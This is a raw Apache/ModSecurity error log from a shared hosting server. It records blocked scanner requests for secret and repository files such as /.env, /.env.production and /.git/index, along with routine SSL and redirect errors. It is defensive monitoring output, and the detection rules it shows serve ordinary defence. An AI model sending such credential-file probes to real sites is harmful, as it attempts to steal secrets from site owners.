[Mon May 11 14:35:52.728045 2026] [security2:error] [pid 1319953:tid 1319967] [client 176.65.139.168:47752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agHNKOSQ-m-m0ukSShtz2QAAAUw"]
[Mon May 11 14:35:52.728415 2026] [security2:error] [pid 1319953:tid 1319967] [client 176.65.139.168:47752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agHNKOSQ-m-m0ukSShtz2QAAAUw"]
[Mon May 11 14:35:53.019315 2026] [security2:error] [pid 1319953:tid 1319967] [client 176.65.139.168:47752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agHNKOSQ-m-m0ukSShtz2QAAAUw"]
[Mon May 11 14:35:57.477589 2026] [:error] [pid 1320674:tid 1320705] [client 114.119.143.207:22187] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=affiliates&systpl=six&language=arabic
[Mon May 11 14:36:05.999685 2026] [security2:error] [pid 1319886:tid 1319916] [client 43.166.247.82:33200] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agHNNay-5-wpj6Sx56aKjQAAAAs"]
[Mon May 11 14:36:07.447470 2026] [security2:error] [pid 1319886:tid 1319919] [client 43.166.247.82:37462] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agHNN6y-5-wpj6Sx56aKjgAAAA0"], referer: http://www.jeanboyault.fr
[Mon May 11 14:36:34.356216 2026] [security2:error] [pid 1320398:tid 1320416] [client 203.17.245.200:62039] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/.git/index"] [unique_id "agHNUuJEyNRN152ArOR9PgAAAFA"]
[Mon May 11 14:36:34.356484 2026] [security2:error] [pid 1320398:tid 1320416] [client 203.17.245.200:62039] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/.git/index"] [unique_id "agHNUuJEyNRN152ArOR9PgAAAFA"]
[Mon May 11 14:36:34.356724 2026] [security2:error] [pid 1320398:tid 1320416] [client 203.17.245.200:62039] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/.git/index"] [unique_id "agHNUuJEyNRN152ArOR9PgAAAFA"]
[Mon May 11 14:36:36.214108 2026] [authz_core:error] [pid 1320398:tid 1320411] [client 47.128.28.147:12052] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 14:36:37.156938 2026] [ssl:error] [pid 1319998:tid 1320024] (EAI 2)Name or service not known: [client 44.229.42.172:37668] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:36:37.156981 2026] [ssl:error] [pid 1319998:tid 1320024] AH01941: stapling_renew_response: responder error
[Mon May 11 14:37:16.847664 2026] [:error] [pid 1319998:tid 1320011] [client 195.178.110.64:52916] File does not exist: /home/totalcloud/public_html/index.php, referer: https://www.totalcloud.fr/wp-login.php
[Mon May 11 14:37:27.242021 2026] [security2:error] [pid 1320674:tid 1320709] [client 176.65.139.168:53918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-de-mobilite-regional.com"] [uri "/.env.local"] [unique_id "agHNh6O9RdIr1DwxYR2E7wAAANQ"]
[Mon May 11 14:37:27.242910 2026] [security2:error] [pid 1320674:tid 1320709] [client 176.65.139.168:53918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-de-mobilite-regional.com"] [uri "/.env.local"] [unique_id "agHNh6O9RdIr1DwxYR2E7wAAANQ"]
[Mon May 11 14:37:28.126904 2026] [security2:error] [pid 1320674:tid 1320690] [client 176.65.139.168:53920] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.env.local"] [unique_id "agHNiKO9RdIr1DwxYR2E8AAAAMA"]
[Mon May 11 14:37:28.127147 2026] [security2:error] [pid 1320674:tid 1320690] [client 176.65.139.168:53920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.env.local"] [unique_id "agHNiKO9RdIr1DwxYR2E8AAAAMA"]
[Mon May 11 14:37:29.419574 2026] [security2:error] [pid 1320674:tid 1320709] [client 176.65.139.168:53918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-de-mobilite-regional.com"] [uri "/index.php"] [unique_id "agHNh6O9RdIr1DwxYR2E7wAAANQ"]
[Mon May 11 14:37:29.544580 2026] [security2:error] [pid 1320674:tid 1320690] [client 176.65.139.168:53920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agHNiKO9RdIr1DwxYR2E8AAAAMA"]
[Mon May 11 14:37:52.359619 2026] [security2:error] [pid 1319886:tid 1319902] [client 77.83.39.197:41136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agHNoKy-5-wpj6Sx56aLJAAAAAM"]
[Mon May 11 14:37:52.360211 2026] [security2:error] [pid 1319886:tid 1319902] [client 77.83.39.197:41136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agHNoKy-5-wpj6Sx56aLJAAAAAM"]
[Mon May 11 14:37:52.361537 2026] [security2:error] [pid 1319886:tid 1319902] [client 77.83.39.197:41136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agHNoKy-5-wpj6Sx56aLJAAAAAM"]
[Mon May 11 14:37:55.483017 2026] [ssl:error] [pid 1319998:tid 1320007] (EAI 2)Name or service not known: [client 116.202.235.23:61872] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:37:55.483529 2026] [ssl:error] [pid 1319998:tid 1320007] AH01941: stapling_renew_response: responder error
[Mon May 11 14:37:55.538755 2026] [ssl:error] [pid 1319885:tid 1319891] (EAI 2)Name or service not known: [client 116.202.235.23:61876] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:37:55.538801 2026] [ssl:error] [pid 1319885:tid 1319891] AH01941: stapling_renew_response: responder error
[Mon May 11 14:37:55.600450 2026] [ssl:error] [pid 1320398:tid 1320404] (EAI 2)Name or service not known: [client 116.202.235.23:61886] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:37:55.600497 2026] [ssl:error] [pid 1320398:tid 1320404] AH01941: stapling_renew_response: responder error
[Mon May 11 14:37:55.650711 2026] [ssl:error] [pid 1320674:tid 1320698] (EAI 2)Name or service not known: [client 116.202.235.23:61892] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:37:55.650745 2026] [ssl:error] [pid 1320674:tid 1320698] AH01941: stapling_renew_response: responder error
[Mon May 11 14:37:59.522209 2026] [autoindex:error] [pid 1319953:tid 1319960] [client 143.110.165.202:35306] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 14:38:00.088701 2026] [:error] [pid 1319998:tid 1320011] [client 143.110.165.202:35406] File does not exist: /home/totalcloud/public_html/index.php, referer: https://ftp.manhattan-studio.fr/
[Mon May 11 14:38:04.125172 2026] [core:error] [pid 1320674:tid 1320696] [client 74.7.175.175:51110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:38:04.125462 2026] [core:error] [pid 1320674:tid 1320696] [client 74.7.175.175:51110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:38:08.737229 2026] [security2:error] [pid 1319886:tid 1319909] [client 77.83.39.197:36336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agHNsKy-5-wpj6Sx56aLPQAAAAc"]
[Mon May 11 14:38:08.737789 2026] [security2:error] [pid 1319886:tid 1319909] [client 77.83.39.197:36336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agHNsKy-5-wpj6Sx56aLPQAAAAc"]
[Mon May 11 14:38:08.741419 2026] [security2:error] [pid 1319886:tid 1319909] [client 77.83.39.197:36336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agHNsKy-5-wpj6Sx56aLPQAAAAc"]
[Mon May 11 14:38:11.086867 2026] [access_compat:error] [pid 1319998:tid 1320019] [client 95.111.239.37:61330] AH01797: client denied by server configuration: /home/maelbail/public_html/wp-content/uploads/wp-statistics/, referer: binance.com
[Mon May 11 14:38:18.666890 2026] [core:error] [pid 1320674:tid 1320700] [client 47.128.60.200:42158] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:38:18.666920 2026] [core:error] [pid 1320674:tid 1320700] [client 47.128.60.200:42158] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:38:35.065452 2026] [security2:error] [pid 1319886:tid 1319929] [client 43.134.186.61:44560] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agHNy6y-5-wpj6Sx56aLYAAAABM"]
[Mon May 11 14:38:38.679071 2026] [security2:error] [pid 1320398:tid 1320418] [client 43.134.186.61:38520] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHNzuJEyNRN152ArOR96AAAAFI"], referer: http://www.pole-mobilite-regional.com
[Mon May 11 14:38:43.443498 2026] [security2:error] [pid 1319953:tid 1319976] [client 43.134.186.61:47590] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHN0-SQ-m-m0ukSSht1CwAAAVU"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 14:39:08.313525 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:44402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.local"] [unique_id "agHN7Ky-5-wpj6Sx56aLjQAAABQ"]
[Mon May 11 14:39:08.314484 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:44402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.local"] [unique_id "agHN7Ky-5-wpj6Sx56aLjQAAABQ"]
[Mon May 11 14:39:11.322916 2026] [security2:error] [pid 1319886:tid 1319931] [client 176.65.139.168:44402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agHN7Ky-5-wpj6Sx56aLjQAAABQ"]
[Mon May 11 14:39:23.400398 2026] [authz_core:error] [pid 1319886:tid 1319919] [client 95.111.239.37:51445] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 14:39:24.079147 2026] [ssl:error] [pid 1319998:tid 1320018] (EAI 2)Name or service not known: [client 74.7.175.189:54728] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:39:24.080135 2026] [ssl:error] [pid 1319998:tid 1320018] AH01941: stapling_renew_response: responder error
[Mon May 11 14:39:32.807719 2026] [authz_core:error] [pid 1320398:tid 1320414] [client 95.111.239.37:54088] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 14:39:41.429239 2026] [core:error] [pid 1319886:tid 1319928] [client 208.84.100.197:53928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.429367 2026] [core:error] [pid 1319886:tid 1319928] [client 208.84.100.197:53928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.557479 2026] [security2:error] [pid 1319885:tid 1319890] [client 208.84.100.197:53954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/.env.production"] [unique_id "agHODVchVQ3tCn0m9OpL0AAAAQI"]
[Mon May 11 14:39:41.557717 2026] [security2:error] [pid 1319885:tid 1319890] [client 208.84.100.197:53954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/.env.production"] [unique_id "agHODVchVQ3tCn0m9OpL0AAAAQI"]
[Mon May 11 14:39:41.560615 2026] [core:error] [pid 1319885:tid 1319890] [client 208.84.100.197:53954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.561389 2026] [security2:error] [pid 1319885:tid 1319890] [client 208.84.100.197:53954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODVchVQ3tCn0m9OpL0AAAAQI"]
[Mon May 11 14:39:41.562766 2026] [core:error] [pid 1320398:tid 1320422] [client 208.84.100.197:54006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.562795 2026] [core:error] [pid 1320398:tid 1320422] [client 208.84.100.197:54006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.563017 2026] [core:error] [pid 1319953:tid 1319957] [client 208.84.100.197:53990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.563034 2026] [core:error] [pid 1319953:tid 1319957] [client 208.84.100.197:53990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
